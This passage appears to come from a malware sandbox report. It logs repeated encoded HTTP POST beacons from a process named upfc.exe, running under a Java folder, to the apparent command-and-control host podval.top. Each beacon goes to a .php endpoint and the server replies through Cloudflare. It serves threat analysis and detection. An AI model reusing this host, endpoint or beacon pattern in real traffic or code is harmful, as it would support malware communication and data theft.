                                                    Jul 3, 2024 16:43:48.103952885 CEST1060OUTData Raw: 5a 52 5a 5f 5e 5d 57 5e 58 56 55 51 50 58 59 5a 55 5f 5e 54 51 5e 53 5f 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZRZ_^]W^XVUQPXYZU_^TQ^S_SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"]2$&9]';Z)=1#!\.-!Y0:'#,-< 2[/,"['$Y !
                                                    Jul 3, 2024 16:43:48.219525099 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:48.561326027 CEST573INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:48 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=An8wjm1AbhgRRGbQIZWCiLIO0E9AQchC1xoXDWsv%2F8PYYNcb77QnyVOUc4%2FcUFXCyFMvYyvr8tmyvqbvlsHMdhCoaEYY81u9yYeBsKaXVSflUjZPQPevrKcLXh8O"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6621e26181d-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a
                                                    Data Ascii: 4;R\P
                                                    Jul 3, 2024 16:43:48.646692038 CEST5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    131192.168.2.1049849188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:48.779884100 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:49.137830019 CEST1060OUTData Raw: 5f 56 5f 54 5b 5e 57 5f 58 56 55 51 50 50 59 51 55 5f 5e 55 51 5c 53 5f 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _V_T[^W_XVUQPPYQU_^UQ\S_SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"%:<'_7Y0##Z*-97\9>)]034;=< !#8"['$Y
                                                    Jul 3, 2024 16:43:49.353463888 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:49.686954021 CEST577INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:49 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vw4Zvnp%2B3BhwbFE5X5Hxn%2FxWnv8uzGoinJULhNotGvM0onoSHBheUNJxH%2FyMC2u2Dnho7ynnejliR7%2Fy6ZDVs7l1EmvM6SseKvC3n7EArTpXXloIOf8QdEkKqxW2"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6692c7a1865-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a
                                                    Data Ascii: 4;R\P
                                                    Jul 3, 2024 16:43:49.773813963 CEST5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    132192.168.2.1049850188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:50.012986898 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:50.372309923 CEST1060OUTData Raw: 5a 52 5f 54 5b 5a 52 58 58 56 55 51 50 58 59 52 55 51 5e 5b 51 5b 53 5b 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZR_T[ZRXXVUQPXYRUQ^[Q[S[SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!29$:7Y$ ')=1#=!-[$%-X$#?;X'[ 1?,"['$Y !
                                                    Jul 3, 2024 16:43:50.486464977 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:50.809441090 CEST578INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:50 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3%2B1lWQpWL4KjGKHN%2FFcHg5nrGsnJ8VHu2e3QvHUUGDVuXEQeOTlljFcDMtLFxNDIsI0mJ4Uv0qp5MVdar7zyRndBLocM6zFxdASUqauUmp0FAHIznwUcNXm6oP0U"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6702fa6432b-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    133192.168.2.1049851188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:50.935625076 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1056
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:51.291654110 CEST1056OUTData Raw: 5f 57 5f 59 5b 5a 52 5d 58 56 55 51 50 59 59 57 55 5e 5e 5f 51 5f 53 56 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _W_Y[ZR]XVUQPYYWU^^_Q_SVSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!': E'*'$V4).)U4-=.-=]'='3?W->(4T+8<"['$Y 5
                                                    Jul 3, 2024 16:43:51.382033110 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:51.598347902 CEST578INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:51 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uyaGYPr12tFX4jb%2BlLPQvtc%2FYtDJgQJWkv7AC6ButGftONFeQmWFgzONillEFu2hKOF4FwVGvvkLRg4RvvYzOfx1LeyQ2A8pi8ACfMPHSxY5piZExjKUzDQRmeey"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a675df7b8c5d-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    134192.168.2.1049852188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:50.940530062 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1748
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:51.291822910 CEST1748OUTData Raw: 5a 55 5f 5f 5e 5a 52 5f 58 56 55 51 50 5d 59 54 55 5b 5e 58 51 5d 53 5b 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZU__^ZR_XVUQP]YTU[^XQ]S[SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"]%<D0+$0[> >5[.>5'C&0 ?->,#T ,<"['$Y 5
                                                    Jul 3, 2024 16:43:51.406107903 CEST25INHTTP/1.1 100 Continue


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    135192.168.2.1049853188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:51.761656046 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:52.119642019 CEST1060OUTData Raw: 5f 52 5f 5c 5b 5b 52 5c 58 56 55 51 50 58 59 52 55 50 5e 5f 51 54 53 5e 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _R_\[[R\XVUQPXYRUP^_QTS^SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"X2),D09(0#$*>1S4:X%$:'3/-=8#2<-<"['$Y !
                                                    Jul 3, 2024 16:43:52.216464043 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:52.564678907 CEST582INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:52 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vFRD%2BRYA%2BBZa9uxIflJAGeYDEZ9mWmBhRaLiUNlU0M8P2o9PsVZqj%2FBcvdN5wO5eBouQjOaRablbTsNvClQielpuFVnuyPRy3iLq%2BPV8vbfIkpIwIwZBD2kkMGrc"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a67b19cc190e-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    136192.168.2.1049854188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:52.689553976 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:53.041673899 CEST1060OUTData Raw: 5f 57 5f 58 5e 5b 57 5f 58 56 55 51 50 50 59 53 55 5b 5e 5d 51 5c 53 56 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _W_X^[W_XVUQPPYSU[^]Q\SVSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"%* &)%3+\)=.#-2.-=36=Z$W;?##;<"['$Y
                                                    Jul 3, 2024 16:43:53.316390038 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:53.452130079 CEST578INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:53 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=59URFG21kIlGJdwpJM8CkYexiXdpVYtUxvDuOg0yFd2iXsAUt7ksyrSbLfXvyGudu7%2Fi8y1C3Pt2eUSaQZhCzDh72yT20n7eaSH6znegJG5iHdiT9ke19YSoB%2Fm8"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a68178748ca1-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    137192.168.2.1049855188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:53.579931974 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:53.932243109 CEST1060OUTData Raw: 5a 57 5a 5b 5b 5b 57 5b 58 56 55 51 50 5e 59 51 55 58 5e 58 51 55 53 5e 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZWZ[[[W[XVUQP^YQUX^XQUS^SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"]&$:4'V$>X1S!=9Y9>635$0;X? $Y;<"['$Y
                                                    Jul 3, 2024 16:43:54.030610085 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:54.397219896 CEST582INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:54 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0Dp0Uh81XrqQidz%2BizYLHCg%2FoKbTLhJEJ3D13vCFG3oCPP3TwVSM5CYZthVj4tXyeY0o%2FcPA7rcSsb8yB%2BouwnyTyyDAl577iWnjCXU0H34OMtoImSK4egBJYQQm"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a68669cb4285-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    138192.168.2.1049856188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:54.540582895 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1048
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:54.886837006 CEST1048OUTData Raw: 5f 5b 5a 5e 5e 5f 52 58 58 56 55 51 50 59 59 53 55 50 5e 5d 51 58 53 59 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _[Z^^_RXXVUQPYYSUP^]QXSYSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"Y&80900^)1V7>5Z,.-X$5$4; "08<"['$Y
                                                    Jul 3, 2024 16:43:55.028476000 CEST25INHTTP/1.1 100 Continue


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    139192.168.2.1049857188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:56.613468885 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1772
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:56.964407921 CEST1772OUTData Raw: 5a 52 5f 54 5e 5a 52 58 58 56 55 51 50 5d 59 5b 55 5d 5e 5d 51 55 53 5c 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZR_T^ZRXXVUQP]Y[U]^]QUS\SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!2?&)#^$ )5U#=%.X!&50#+/>'X#!;8<"['$Y 5
                                                    Jul 3, 2024 16:43:57.068679094 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:57.282243967 CEST725INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:57 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mmo95KsdU%2BfEgGGPI792vASBcfSUNsnJ6GiiDl9QJqrNX4MdlUJJy76qAJLYf9J49slXevBxKxFtWbMMfmW3ihEIzX6ZtxPrCRtChMaJiv839jzf7XRcChbMQxJe"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6996d9619ef-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 25 15 25 29 2d 13 31 0c 20 0b 2d 5b 27 51 29 2d 3b 04 3b 07 07 14 28 0a 3d 58 2d 2d 2d 0a 22 2a 04 18 2a 3f 27 01 25 30 0d 0f 36 31 20 5b 04 1c 23 5a 3f 04 31 5a 2b 01 2b 11 25 12 00 1e 27 24 35 5d 27 2b 08 53 27 38 2f 5c 3f 28 26 0e 33 22 30 03 3d 16 2d 00 28 19 21 06 22 24 21 54 02 13 22 12 33 3d 14 0b 20 30 05 52 26 33 3d 14 30 1d 24 09 33 30 2e 56 29 55 3a 1d 27 57 20 5d 36 2c 3f 55 30 06 26 5c 24 2d 25 58 22 12 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98%%)-1 -['Q)-;;(=X---"**?'%061 [#Z?1Z++%'$5]'+S'8/\?(&3"0=-(!"$!T"3= 0R&3=0$30.V)U:'W ]6,?U0&\$-%X"#_+)V3YT0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    140192.168.2.1049858188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:56.806241989 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:57.151961088 CEST1060OUTData Raw: 5f 50 5f 5d 5e 5a 57 5f 58 56 55 51 50 50 59 5a 55 5f 5e 5a 51 5f 53 56 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _P_]^ZW_XVUQPPYZU_^ZQ_SVSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"'9&:'3+)X1U!-%..Z&5:$?--;7!;/,"['$Y
                                                    Jul 3, 2024 16:43:57.269869089 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:57.612257004 CEST586INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:57 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XN9Ai9h%2B3rMd3BRKar9IpML4rwxAC%2FXl3g3uWp2kYWfBOVEMoSUDyu%2BelNi96UY4wb7IgfC%2Blx%2BowFeB1OI6U8dEWGFPey%2BDPxzKnVWfWMrioHrdH3oCUEVjpowd"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a69aabc61791-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    141192.168.2.1049859188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:57.733705044 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1048
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:58.089350939 CEST1048OUTData Raw: 5f 55 5a 5e 5b 56 52 5b 58 56 55 51 50 59 59 53 55 5c 5e 5b 51 55 53 56 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _UZ^[VR[XVUQPYYSU\^[QUSVSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!'9;3)'(>9W4%[:==\$.$#(-=$ T#,,"['$Y 1
                                                    Jul 3, 2024 16:43:58.179328918 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:58.421811104 CEST584INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:58 GMT
                                                    Content-Type: text/html; charset=UTF-8
